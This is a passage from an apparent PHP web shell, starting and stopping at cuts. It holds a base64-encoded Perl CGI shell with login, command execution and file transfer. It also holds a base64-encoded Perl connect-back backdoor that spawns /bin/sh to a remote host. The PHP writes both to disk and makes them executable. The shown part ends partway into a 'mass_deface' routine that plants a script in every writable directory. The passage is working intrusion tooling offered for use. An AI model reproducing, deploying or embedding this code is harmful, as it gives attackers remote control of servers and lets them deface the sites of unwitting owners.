IiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWRQYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K';
1226.  
1227. $file = fopen("izo.cin" ,"w+");
1228.  
1229. $write = fwrite ($file ,base64_decode($cgishellizocin));
1230.  
1231. fclose($file);
1232.  
1233. chmod("izo.cin",0755);
1234.  
1235. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
1236.  
1237. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
1238.  
1239. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
1240.  
1241. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
1242.  
1243. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
1244.  
1245. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
1246.  
1247. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
1248.  
1249. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
1250.  
1251. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
1252.  
1253. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
1254.  
1255. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
1256.  
1257. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
1258.  
1259. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
1260.  
1261. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
1262.  
1263. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
1264.  
1265. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
1266.  
1267. YXRhY2hlZFxuXG4iOw==';
1268.  
1269. $file = fopen("dc.pl" ,"w+");
1270.  
1271. $write = fwrite ($file ,base64_decode($netcatshell));
1272.  
1273. fclose($file);
1274.  
1275. chmod("dc.pl",0755);
1276.  
1277. echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe>
1278.  
1279. </div>"; }
1280.  
1281. elseif($_GET['opt'] == 'mass_deface') {
1282.  
1283. function sabun_massal($path,$namafile,$isi_script) {
1284.  
1285. if(is_writable($path)) {
1286.  
1287. $dira = scandir($path);
1288.  
1289. foreach($dira as $dirb) {
1290.  
1291. $dirc = "$path/$dirb";
1292.  
1293. $lokasi = $dirc.'/'.$namafile;
1294.  
1295. if($dirb === '.') {
1296.  
1297. file_put_contents($lokasi, $isi_script);
1298.  
1299. } elseif($dirb === '..') {
1300.  
1301. file_put_contents($lokasi, $isi_script);
1302.  
1303. } else {
1304.  
